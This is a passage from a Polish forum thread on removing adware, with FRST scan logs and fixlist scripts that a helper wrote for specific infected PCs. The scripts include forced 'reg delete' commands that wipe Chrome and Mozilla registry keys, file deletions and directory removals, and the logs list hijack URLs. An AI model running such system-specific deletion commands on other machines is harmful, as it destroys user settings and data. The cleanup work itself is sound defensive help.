ZTEusbnmea; system32\DRIVERS\ZTEusbnmea.sys [X] S3 ZTEusbser6k; system32\DRIVERS\ZTEusbser6k.sys [X] Task: {15A18217-198C-4CC9-9C16-4B1F6B0047D9} - System32\Tasks\{D24F617A-77F2-4066-9A35-6EA73973CEA8} => E:\Setup.exe Task: {18952A63-579B-4AAF-AD62-0E541611DD72} - System32\Tasks\{0C6E060E-2ED4-45CF-B20E-DF2486577280} => C:\Users\Marcin\Desktop\POBIERANIE\Virtual DJ Pro 7 & Serial\Virtual DJ Pro 7 & Serial\Virtual DJ Pro 7.exe Task: {216F590D-3DC3-4899-862D-7043417EB176} - System32\Tasks\{E8494EE5-254B-4E3C-B0B4-9FAD5661ED22} => pcalua.exe -a "C:\Program Files (x86)\Emergency 3\ModInstaller.exe" -d "C:\Program Files (x86)\Emergency 3" Task: {265359E6-A98D-48AD-A538-1D5D328DC313} - System32\Tasks\{50186A91-80DF-400B-B8D8-65C110FBD04A} => C:\Program Files (x86)\ArcSoft\TotalMedia 3.5\TotalMedia.exe Task: {297CA3A8-0C38-4AB5-AE7A-D21617BF2E2A} - System32\Tasks\{9920BCAE-1505-44A3-BAAA-D93FD1416D3E} => C:\Program Files (x86)\Emergency 3\Em3.exe Task: {378B5784-561C-4624-917C-C51A862FBF35} - System32\Tasks\{D23324FB-EADB-438E-896C-EDBF078F2F1A} => C:\Users\Marcin\Desktop\STARY LAPTOP\Faraon - Pharaoh PL\SIERRA\SETUP.EXE Task: {4223CE68-8547-4BAA-892E-941C88C0E305} - System32\Tasks\{29383770-B5CD-4D86-95AC-6A2EA56556A2} => C:\Users\Marcin\Desktop\STARY LAPTOP\Faraon - Pharaoh PL\SIERRA\SETUP.EXE Task: {427E28D4-19A3-4D3E-BA34-9266BECFC380} - System32\Tasks\{F2E71516-7AD8-4CA4-BDDD-9781FE38C903} => C:\Users\Marcin\Desktop\STARY LAPTOP\Faraon - Pharaoh PL\SIERRA\SETUP.EXE Task: {44E12810-B534-4A81-8CE6-A167DF27BDA3} - System32\Tasks\{E76E5447-6E44-44F4-9804-A1807BA2DA6A} => E:\Setup.exe Task: {5139A7B2-CE08-41C3-8A3E-E97F89E9C382} - System32\Tasks\{BAA464EE-75C5-43CD-8356-D19C34967262} => C:\Users\Marcin\Desktop\POBIERANIE\Virtual DJ Pro 7 & Serial\Virtual DJ Pro 7 & Serial\Virtual DJ Pro 7.exe Task: {52D8900F-4448-46DA-82D9-F8C46008D62D} - System32\Tasks\{7EEE4116-8EDF-4521-B911-158E4DF3EDF5} => C:\Program Files (x86)\VirtualDJ\virtualdj_pro.exe [2010-10-12] (Atomix Productions) Task: {571E0506-00D4-442F-BBE1-12CD777F6A8F} - System32\Tasks\{B58D1BB3-3505-4986-AF29-B0861F625D54} => C:\Program Files (x86)\Enlight Software\Hotel Giant\hotel.exe Task: {5AD8AB6B-30C7-45D0-8C45-FF439B37CC47} - System32\Tasks\Omiga Plus RunAsStdUser => C:\Program Files (x86)\Omiga Plus\omigaplus.exe Task: {6023F391-BE36-4C47-A679-A56CF07E551C} - \Program aktualizacji online firmy Logitech. No Task File Task: {61FEFDF5-612A-4D55-BE49-42DC50E39CBB} - System32\Tasks\{F266AD1B-7FC4-48FA-B4FA-181866D9433D} => pcalua.exe -a C:\Users\Marcin\Desktop\VSX3_Pro_TBYB.exe -d C:\Users\Marcin\Desktop Task: {61FFAC96-A131-40A2-8DC4-CB4D836275BD} - System32\Tasks\{C937CA49-6C4C-4136-8286-58C026B113A0} => pcalua.exe -a "C:\Users\Marcin\Desktop\Magic Mouse Driver\Apple-MagicMouse-Driver_64bit.exe" -d "C:\Users\Marcin\Desktop\Magic Mouse Driver" Task: {6F97F297-95FF-4E72-B211-F5818D6C84EC} - System32\Tasks\{0125155C-D145-4C1B-9113-1D006DB0807E} => C:\Program Files (x86)\MAGIX\Movie_Edit_Pro_17_Plus_Download_Version\Videodeluxe.exe Task: {74873DF5-CE52-4A30-BA78-FE0F52C50A6F} - System32\Tasks\{FE5F14C9-0DD7-429D-B24F-51DEC5CDC802} => C:\Program Files (x86)\Emergency 3\Em3.exe Task: {749555C4-E731-4F47-80BF-6CC26ABE74FA} - System32\Tasks\{D3A18EC7-D968-4402-8F34-606DF733588B} => E:\Setup.exe Task: {76C744E4-5281-4EE3-9DDB-51F22F231858} - System32\Tasks\{68ACCDBC-29B3-4650-B34B-9330376D875F} => pcalua.exe -a C:\PROGRA~2\VIRTUA~1\UNWISE.EXE -c C:\PROGRA~2\VIRTUA~1\INSTALL.LOG Task: {818B49CC-7218-4BAC-80C2-738D6CDC508D} - System32\Tasks\{5F33BCFB-702A-4CB2-8D21-33961E5A2408} => C:\Program Files (x86)\Enlight Software\Hotel Giant\hotel.exe Task: {824A98BC-C56C-456C-A54C-128040BDD38C} - System32\Tasks\{ECF0CE26-5B9C-47A8-B36E-CA040427DFB0} => C:\Users\Marcin\Desktop\STARY LAPTOP\Faraon - Pharaoh PL\SIERRA\SETUP.EXE Task: {8C0AE68A-2216-4181-B839-04CD48744CD2} - System32\Tasks\FileAdvisorCheck => C:\Program Files (x86)\File Type Advisor\file-type-advisor.exe [2013-09-04] (filetypeadvisor.com ) Task: {9C9491DC-D5EE-44F7-938B-1831C106DECC} - System32\Tasks\{02006280-0368-4B7C-BF1F-1C3685153417} => C:\Users\Marcin\Desktop\STARY LAPTOP\Faraon - Pharaoh PL\SIERRA\Faraon\Pharaoh.exe Task: {9D6797C6-F86F-4C7C-8DC6-0F6D009756D5} - System32\Tasks\{9419727D-83C4-4CC9-AB62-9CF788B9A2B8} => C:\Program Files (x86)\Emergency 3\Em3.exe Task: {A3F6B407-0E9E-4A83-B498-0CF16232A544} - System32\Tasks\Binkiland redi => C:\ProgramData\{465BAE98-16D9-7F1E-A75F-0F9C77DDDC12}\1.9.3.1\f Task: {B2679A5F-0C7E-4793-B5CF-B94B73AC3EDD} - System32\Tasks\{01344179-7362-4317-8FBA-122079797C1F} => F:\Aplikacje\Pelne\DETEKTYW.exe Task: {B72713A7-D62D-4063-97B1-03EDDB5A888F} - System32\Tasks\{07AB32F2-1F69-4422-A30E-AD925F77EE7E} => F:\Aplikacje\Pelne\DETEKTYW.exe Task: {BAE95791-EC8E-4E14-8D9A-E651756CA014} - System32\Tasks\FileAdvisorUpdate => C:\Program Files (x86)\File Type Advisor\fileadvisor.exe [2013-09-04] (File Type Advisor) Task: {BC976ACE-AA1B-419E-8A75-83A2C0E9412A} - System32\Tasks\{4D832EE1-91BC-48B8-BD20-BD360101F8C5} => C:\Program Files (x86)\ArcSoft\TotalMedia 3.5\TotalMedia.exe Task: {BCB724E4-6E9B-4AB8-A4E7-358226834B90} - System32\Tasks\{7324BEB5-0C70-4D40-B1B1-9FEA064782ED} => C:\Users\Marcin\Desktop\STARY LAPTOP\Faraon - Pharaoh PL\SIERRA\SETUP.EXE Task: {BF88BA6F-0783-4D0D-996E-32A7012146DE} - System32\Tasks\Desk 365 RunAsStdUser => C:\Program Files (x86)\Desk 365\desk365.exe Task: {C0A0FD59-BC6C-4742-9878-885F10B86F9B} - System32\Tasks\{63E10826-C2E8-4912-97D8-EB143EDBC727} => C:\Users\Marcin\Desktop\STARY LAPTOP\Faraon - Pharaoh PL\SIERRA\SETUP.EXE Task: {C36882B5-D8EA-4939-95FB-64B0B56420B0} - System32\Tasks\{84986CB7-7428-48DF-A35C-AE4670F77FFF} => C:\Users\Marcin\Desktop\karafun nuty\KaraFun Studio 1.10a Portable - odtwarzacz i edytor\KaraFun Studio 1.10a (Portable)\KaraFun.exe Task: {C5605991-14C3-4A40-84E1-CCB08425935F} - System32\Tasks\{E09B9669-5E47-415B-8E20-11141295D11A} => E:\Setup.exe Task: {C9987224-08E6-4552-87E0-DA13F486CDE6} - System32\Tasks\{DE39FF16-A3DF-4FC3-81F3-7545C43B9816} => C:\Users\Marcin\Downloads\ChomikBox\Collin McRae 04 RIP\Collin McRae 04 RIP\CollinMcRae04\cmr4.exe Task: {CB17DD0D-9278-4DD4-995C-6018EB7B7EB9} - System32\Tasks\{1508DE4F-B90F-49D5-AFF7-D1BC749CD9AE} => C:\Program Files (x86)\Emergency 3\Em3.exe Task: {CE4645E9-D139-4D60-9EF0-BDE451AC021F} - System32\Tasks\{E82259CA-13C5-4C83-9F73-ED2DAB4B5C8D} => pcalua.exe -a "C:\Users\Marcin\Desktop\sety\milk\ulead video studio11pl\ulead video studio11pl\UVS11_Pack_Pol-szablony.exe" -d "C:\Users\Marcin\Desktop\sety\milk\ulead video studio11pl\ulead video studio11pl" Task: {D7D26FF7-FC28-4D44-B96E-56DD58045A9E} - System32\Tasks\{04E1A439-DC22-47E0-B6FB-E56F87154541} => G:\FOLDERY Z PULPITU\na laptopa\install_virtualdj_v5.0.exe Task: {E651230C-A392-4C6D-9E7D-0BD74F70D8CB} - System32\Tasks\{4C41E416-59B2-4712-A032-84C43E8AD9DC} => E:\Setup.exe Task: {EB8B3E74-941A-41AA-BC31-A316CC4978BC} - System32\Tasks\{A05CDBAA-A8BF-4AF1-9529-C141AFAE8D84} => C:\Program Files (x86)\ArcSoft\TotalMedia 3.5\TotalMedia.exe Task: {EE705217-6BBB-465E-9651-66E7047C1149} - System32\Tasks\Wse_binkiland => C:\Users\Marcin\AppData\Roaming\Wse_binkiland\UpdateProc\UpdateTask.exe [2015-03-11] () Task: {EFBE5A1D-C108-4977-894C-A7509FD61104} - System32\Tasks\{84A32FF4-6188-4421-B0AD-5582A67C0ECC} => pcalua.exe -a "F:\USB Driver for Windows OS\setup.exe" -d "F:\USB Driver for Windows OS" Task: {FA6810CF-BC29-490E-BB72-2AD7867ACF19} - System32\Tasks\{668BD109-6D84-49ED-ABEB-0882432C247F} => C:\Users\Marcin\Desktop\STARY LAPTOP\Faraon - Pharaoh PL\SIERRA\SETUP.EXE Task: C:\windows\Tasks\Wse_binkiland.job => C:\Users\Marcin\AppData\Roaming\WSE_BI~1\UPDATE~1\UPDATE~1.EXE AppInit_DLLs-x32: C:/PROGRA~3/{465BA~1/193~1.1/redi.dll => C:\ProgramData\{465BAE98-16D9-7F1E-A75F-0F9C77DDDC12}\1.9.3.1\redi.dll [1010688 2015-03-11] () HKLM-x32\...\Run: [] => [X] HKLM-x32\...\Run: [searchSettings] => "C:\Program Files (x86)\Common Files\Spigot\Search Settings\SearchSettings.exe" HKLM\...\Policies\Explorer: [NoControlPanel] 0 CHR HKLM\SOFTWARE\Policies\Google: Policy restriction CHR HomePage: Default -> hxxp://binkiland.com/?f=1&a=bnk_ir_15_11&cd=2XzuyEtN2Y1L1Qzu0D0CtD0E0AtCyB0AyEzy0FzztCtCyDyDtN0D0Tzu0StCtCyCyDtN1L2XzutAtFzztFtAtFtBtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2SyEyB0AyB0AtAyBtCtGtD0CyEtBtGtDyCtAtAtGyCtAtB0AtGyC0FyBtA0B0E0DyBtB0C0D0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0Fzz0C0AyDtC0BtCtGtCtDzyyCtGyEyDzzyBtG0AtCyEtDtG0FtD0EtA0AyB0CzzyCtDtDtC2QtN1B2Z1V1T1S1NzuyDzztD&cr=360148023&ir= CHR StartupUrls: Default -> "hxxp://binkiland.com/?f=7&a=bnk_ir_15_11&cd=2XzuyEtN2Y1L1Qzu0D0CtD0E0AtCyB0AyEzy0FzztCtCyDyDtN0D0Tzu0StCtCyCyDtN1L2XzutAtFzztFtAtFtBtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2SyEyB0AyB0AtAyBtCtGtD0CyEtBtGtDyCtAtAtGyCtAtB0AtGyC0FyBtA0B0E0DyBtB0C0D0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0Fzz0C0AyDtC0BtCtGtCtDzyyCtGyEyDzzyBtG0AtCyEtDtG0FtD0EtA0AyB0CzzyCtDtDtC2QtN1B2Z1V1T1S1NzuyDzztD&cr=360148023&ir=" ShortcutWithArgument: C:\Users\Marcin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.qvo6.com/?utm_source=b&utm_medium=wpc&utm_campaign=eXQ&utm_content=sc&from=wpc&uid=ST9500325AS_S2WBAGX5XXXXS2WBAGX5&ts=1379357098 ShortcutWithArgument: C:\Users\Marcin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.qvo6.com/?utm_source=b&utm_medium=wpc&utm_campaign=eXQ&utm_content=sc&from=wpc&uid=ST9500325AS_S2WBAGX5XXXXS2WBAGX5&ts=1379357098 ShortcutWithArgument: C:\Users\Marcin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.qvo6.com/?utm_source=b&utm_medium=wpc&utm_campaign=eXQ&utm_content=sc&from=wpc&uid=ST9500325AS_S2WBAGX5XXXXS2WBAGX5&ts=1379357098 HKU\S-1-5-21-3726203623-1480336290-1624226094-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.qvo6.com/?utm_source=b&utm_medium=wpc&utm_campaign=eXQ&utm_content=hp&from=wpc&uid=ST9500325AS_S2WBAGX5XXXXS2WBAGX5&ts=1379357098 HKU\S-1-5-21-3726203623-1480336290-1624226094-1000\Software\Microsoft\Internet Explorer\Main,Start Page = http://binkiland.com/?f=1&a=bnk_ir_15_11&cd=2XzuyEtN2Y1L1Qzu0D0CtD0E0AtCyB0AyEzy0FzztCtCyDyDtN0D0Tzu0StCtCyCyDtN1L2XzutAtFzztFtAtFtBtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2SyEyB0AyB0AtAyBtCtGtD0CyEtBtGtDyCtAtAtGyCtAtB0AtGyC0FyBtA0B0E0DyBtB0C0D0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0Fzz0C0AyDtC0BtCtGtCtDzyyCtGyEyDzzyBtG0AtCyEtDtG0FtD0EtA0AyB0CzzyCtDtDtC2QtN1B2Z1V1T1S1NzuyDzztD&cr=360148023&ir= HKU\S-1-5-21-3726203623-1480336290-1624226094-1000\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie HKU\S-1-5-21-3726203623-1480336290-1624226094-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com/ie URLSearchHook: HKLM-x32 - (No Name) - {dd02a4eb-4afd-4d60-99d8-e67f964ca813} - No File SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://search.qvo6.com/web/?utm_source=b&utm_medium=wpc&utm_campaign=eXQ&utm_content=ds&from=wpc&uid=ST9500325AS_S2WBAGX5XXXXS2WBAGX5&ts=1379357098&type=default&q={searchTerms} SearchScopes: HKLM -> {0b4d26f6-61a8-4463-99dd-5f2fe0400fa6} URL = SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://search.qvo6.com/web/?utm_source=b&utm_medium=wpc&utm_campaign=eXQ&utm_content=ds&from=wpc&uid=ST9500325AS_S2WBAGX5XXXXS2WBAGX5&ts=1379357098&type=default&q={searchTerms} SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://search.qvo6.com/web/?utm_source=b&utm_medium=wpc&utm_campaign=eXQ&utm_content=ds&from=wpc&uid=ST9500325AS_S2WBAGX5XXXXS2WBAGX5&ts=1379357098&type=default&q={searchTerms} SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://search.qvo6.com/web/?utm_source=b&utm_medium=wpc&utm_campaign=eXQ&utm_content=ds&from=wpc&uid=ST9500325AS_S2WBAGX5XXXXS2WBAGX5&ts=1379357098&type=default&q={searchTerms} SearchScopes: HKLM-x32 -> {afdbddaa-5d3f-42ee-b79c-185a7020515b} URL = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT2086743 SearchScopes: HKU\S-1-5-21-3726203623-1480336290-1624226094-1000 -> DefaultScope {1FEBBADB-6598-4F3A-AD0D-9853FC5F7F9D} URL = http://binkiland.com/results.php?f=4&q={searchTerms}&a=bnk_ir_15_11&cd=2XzuyEtN2Y1L1Qzu0D0CtD0E0AtCyB0AyEzy0FzztCtCyDyDtN0D0Tzu0StCtCyCyDtN1L2XzutAtFzztFtAtFtBtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2SyEyB0AyB0AtAyBtCtGtD0CyEtBtGtDyCtAtAtGyCtAtB0AtGyC0FyBtA0B0E0DyBtB0C0D0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0Fzz0C0AyDtC0BtCtGtCtDzyyCtGyEyDzzyBtG0AtCyEtDtG0FtD0EtA0AyB0CzzyCtDtDtC2QtN1B2Z1V1T1S1NzuyDzztD&cr=360148023&ir= SearchScopes: HKU\S-1-5-21-3726203623-1480336290-1624226094-1000 -> 01541664AF5149FF9B4D94F43912017D URL = http://search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=616163&p={searchTerms} SearchScopes: HKU\S-1-5-21-3726203623-1480336290-1624226094-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-3726203623-1480336290-1624226094-1000 -> {0b4d26f6-61a8-4463-99dd-5f2fe0400fa6} URL = https://search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=616163&p={searchTerms} SearchScopes: HKU\S-1-5-21-3726203623-1480336290-1624226094-1000 -> {1C28216C-7919-4B10-A179-75FB0726B269} URL = http://websearch.ask.com/redirect?client=ie&tb=ORJ&o=&src=kw&q={searchTerms}&locale=&apn_ptnrs=U3&apn_dtid=OSJ000YYPL&apn_uid=D24CE55F-883C-4AE5-8182-D84E11877E8E&apn_sauid=927F4496-103D-4301-9108-20F985683160 SearchScopes: HKU\S-1-5-21-3726203623-1480336290-1624226094-1000 -> {1FEBBADB-6598-4F3A-AD0D-9853FC5F7F9D} URL = http://binkiland.com/results.php?f=4&q={searchTerms}&a=bnk_ir_15_11&cd=2XzuyEtN2Y1L1Qzu0D0CtD0E0AtCyB0AyEzy0FzztCtCyDyDtN0D0Tzu0StCtCyCyDtN1L2XzutAtFzztFtAtFtBtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2SyEyB0AyB0AtAyBtCtGtD0CyEtBtGtDyCtAtAtGyCtAtB0AtGyC0FyBtA0B0E0DyBtB0C0D0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0Fzz0C0AyDtC0BtCtGtCtDzyyCtGyEyDzzyBtG0AtCyEtDtG0FtD0EtA0AyB0CzzyCtDtDtC2QtN1B2Z1V1T1S1NzuyDzztD&cr=360148023&ir= SearchScopes: HKU\S-1-5-21-3726203623-1480336290-1624226094-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://search.delta-homes.com/web/?utm_source=b&utm_medium=newgdp&utm_campaign=eXQ&utm_content=ds&from=newgdp&uid=ST9500325AS_S2WBAGX5XXXXS2WBAGX5&ts=1380327043&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-3726203623-1480336290-1624226094-1000 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = http://www.google.com/search?q={sear SearchScopes: HKU\S-1-5-21-3726203623-1480336290-1624226094-1000 -> {afdbddaa-5d3f-42ee-b79c-185a7020515b} URL = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT2086743 SearchScopes: HKU\S-1-5-21-3726203623-1480336290-1624226094-1000 -> {B224AA02-F7C8-3A2B-859F-560B80767E4A} URL = http://kl.startnow.com/s/?q={searchTerms}&src=defsearch&provider=&provider_name=yahoo&provider_code=&partner_id=693&product_id=876&affiliate_id=&channel=&toolbar_id=200&toolbar_version=2.5.0&install_country=PL&install_date=20130215&user_guid=2606DD330AB34104B30E522DE6924709&machine_id=f63707c914f863bac8be7c90d9c224e3&browser=IE&os=win&os_version=6.1-x64-SP1&iesrc={referrer:source} SearchScopes: HKU\S-1-5-21-3726203623-1480336290-1624226094-1000 -> {C9D00D2D-A4FC-4B2E-93AE-F4567EDAB646} URL = http://search.softonic.com/MON00085/tb_v1?q={searchTerms}&SearchSource=4&cc= BHO-x32: Dealio Toolbar -> {01398B87-61AF-4FFB-9AB5-1A1C5FB39A9C} -> C:\Program Files (x86)\Dealio Toolbar\IE\10.0\dealioToolbarIE.dll [2014-10-21] (Spigot, Inc.) Toolbar: HKLM - Dealio Toolbar - {01398B87-61AF-4FFB-9AB5-1A1C5FB39A9C} - C:\Program Files (x86)\Dealio Toolbar\IE\10.0\dealioToolbarIE64.dll [2014-10-21] (Spigot, Inc.) Toolbar: HKLM-x32 - No Name - {5911488E-9D1E-40ec-8CBB-06B231CC153F} - No File Toolbar: HKLM-x32 - No Name - {95B7759C-8C7F-4BF1-B163-73684A933233} - No File Toolbar: HKLM-x32 - Dealio Toolbar - {01398B87-61AF-4FFB-9AB5-1A1C5FB39A9C} - C:\Program Files (x86)\Dealio Toolbar\IE\10.0\dealioToolbarIE.dll [2014-10-21] (Spigot, Inc.) Toolbar: HKU\S-1-5-21-3726203623-1480336290-1624226094-1000 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No File Toolbar: HKU\S-1-5-21-3726203623-1480336290-1624226094-1000 -> No Name - {E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39} - No File Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - No File StartMenuInternet: IEXPLORE.EXE - iexplore.exe StartMenuInternet: Google Chrome - chrome.exe C:\Program Files (x86)\Dealio Toolbar C:\Program Files (x86)\File Type Advisor C:\Program Files (x86)\StartNow Toolbar C:\Program Files (x86)\WSE_Binkiland C:\ProgramData\{465BAE98-16D9-7F1E-A75F-0F9C77DDDC12} C:\ProgramData\Microsoft\Windows\Start Menu\LG PC Suite.Lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\File Type Advisor C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MyFree Codec C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NUMARK C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VUGames C:\ProgramData\Temp C:\ProgramData\TuneUp Software C:\Users\Groszek\Desktop\SWAT 4.lnk C:\Users\Marcin\AppData\Local\dt.dat C:\Users\Marcin\AppData\Local\Google\Chrome\User Data\Default\Preferences C:\Users\Marcin\AppData\Local\Google\Chrome\User Data\Default\Extensions\newtab.crx C:\Users\Marcin\AppData\Roaming\LiveSupport.exe_log.txt C:\Users\Marcin\AppData\Roaming\regsvr32.exe_log.txt C:\Users\Marcin\AppData\Roaming\ACEStream C:\Users\Marcin\AppData\Roaming\FileAdvisor C:\Users\Marcin\AppData\Roaming\Opera Software C:\Users\Marcin\AppData\Roaming\SkypEmoticons C:\Users\Marcin\AppData\Roaming\Wse_binkiland C:\Users\Marcin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ace Stream Media C:\Users\Marcin\Desktop\pulpit\pisma\iTunes.lnk C:\Windows\msdownld.tmp C:\Windows\System32\drivers\wStLib64.sys Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f Reg: reg delete HKCU\Software\Google\Chrome\Extensions /f Reg: reg delete HKCU\Software\Mozilla /f Reg: reg delete HKCU\Software\MozillaPlugins /f Reg: reg delete HKLM\SOFTWARE\Google\Chrome\Extensions /f Reg: reg delete HKLM\SOFTWARE\Mozilla /f Reg: reg delete HKLM\SOFTWARE\MozillaPlugins /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Mozilla /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\mozilla.org /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\MozillaPlugins /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. W Google Chrome: Ustawienia > karta Rozszerzenia > odinstaluj AVG Nation Toolbar, AS Magic Player, Magic Player (o ile nadal będą widoczne po w/w deinstalacjach). Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Zresetuj ustawienia przeglądarki. Zakładki i hasła nie zostaną naruszone, ale używane rozszerzenia zostaną wyłączone (aktywuj ponownie). Ustawienia > karta Ustawienia > sekcja Wyszukiwanie > klik w Zarządzanie wyszukiwarkami > skasuj z listy niedomyślne śmieci (o ile będą). Zresetuj cache wtyczek. W pasku adresów wpisz chrome://plugins i ENTER. Na liście wtyczek wybierz dowolną i kliknij Wyłącz. Następnie wtyczkę ponownie Włącz. 4. W systemie są dwa konta, z każdego wymagane raporty: ==================== Accounts: ============================= Groszek (S-1-5-21-3726203623-1480336290-1624226094-1003 - Limited - Enabled) => C:\Users\Groszek Marcin (S-1-5-21-3726203623-1480336290-1624226094-1000 - Administrator - Enabled) => C:\Users\Marcin Po kolei zaloguj się na każde poprzez pełny restart systemu, a nie opcje Wyloguj czy Przełącz użytkownika. Na każdym zrób nowy log FRST z opcji Scan, zaznacz pole Addition, by powstały dwa raporty. na koncie limitowanym Groszek uruchom FRST poprzez dwuklik a nie "Uruchom jako Administrator" (zmieni kontekst konta na Marcina). Dołącz też plik fixlog.txt.

Wszystko wykonane, ale jeszcze drobne poprawki: 1. W Google Chrome: Ustawienia > karta Ustawienia > Po uruchomieniu > Otwórz konkretną stronę lub zestaw stron > usuń podwójne wystąpienie adresu adware default-search.net, przestaw na "Otwórz stronę nowej karty". 2. Otwórz Notatnik i wklej w nim: HKU\S-1-5-21-251673657-1254408106-2500988348-1000\...\Run: [msnmsgr] => "C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe" /background RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\Program Files (x86)\Mozilla Maintenance Service CMD: del /q C:\Users\qvvas\Downloads\e943er98.exe Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Tym razem nie będzie restartu. Przedstaw wynikowy fixlog.txt.

Wielkość liternictwa nie ma znaczenia w skryptach FRST. Ważne, by po przeklejeniu do Notatnika nie pojawiły się jakieś dodatkowe spacje. Po przeklejeniu skontroluj te słowa, które zostały zmanipulowane, i tam gdzie na stronie widać zielony znaczek w Notatniku nie ma być spacji. Skorzystaj z tej wersji FRST, którą posiadasz.

Czyszczę temat z dopisków. Tak, miałam kłopoty ze zdrowiem. Wracając do meritum, widzę malware SkypeFall: KLIK. Ponadto, jest mnóstwo zainstalowanych obiektów adware czynnie produkujących reklamy i przekierowania, na dodatek przeglądarka Google Chome została przez adware przekonwertowana z wersji stabilnej do developerskiej i wymagana reinstalacja przeglądarki. Przekierowania mystartsearch.com to wina zmodyfikowanych skrótów LNK przeglądarek, ale to tylko jeden z wielu problemów adware. Działania do przeprowadzenia: 1. Przez Panel sterowania odinstaluj poszkodowane Google Chrome oraz adware/malware BorderlineMaker, CYF version 1.0, RelaySys, Roll Around, SkypeFall version 1.0, SkypEmoticons, WorldWideWebCoupon. Przy deinstalacji Chrome zaznacz Usuń także dane przeglądarki, resztę doczyści punkt 2. Dodatkowo, są też pozycje Video Rotator V1.0.9, WinISD beta, które mają multum pustych skrótów, więc tego też się pozbądź. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: R2 63816b85; c:\Program Files (x86)\BorderlineMaker\BorderlineMaker.dll [1951232 2015-03-06] () [File not signed] R2 bce312cc; c:\Program Files (x86)\RelaySys\RelaySys.dll [1967104 2015-03-03] () [File not signed] R2 ec9c17f1; c:\Program Files (x86)\SoftwarePlus\SoftwarePlus.dll [1685504 2015-02-26] () [File not signed] R2 Service Mgr RollAround; C:\ProgramData\2a617352-d396-46a3-a71b-5d89535356cf\plugincontainer.exe [581360 2015-03-06] () R2 Update Mgr RollAround; C:\Program Files (x86)\Common Files\2a617352-d396-46a3-a71b-5d89535356cf\updater.exe [388848 2015-03-06] () S3 FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys [X] Task: {F0C4F8BA-4B3C-4729-9996-711832756949} - System32\Tasks\Ad-Aware Update (Weekly) => C:\Program Files (x86)\Lavasoft\Ad-Aware\Ad-AwareAdmin.exe HKU\S-1-5-21-945938231-2787147350-3338407632-1000\...\Run: [DAEMON Tools Lite] => "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun HKU\S-1-5-21-945938231-2787147350-3338407632-1000\...\MountPoints2: {472f6686-5eac-11e4-b368-5404a6b0d4c8} - H:\setup.exe GroupPolicy: Group Policy on Chrome detected CHR HKLM\SOFTWARE\Policies\Google: Policy restriction ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> D:\programy\firefox\firefox.exe (Mozilla Corporation) -> 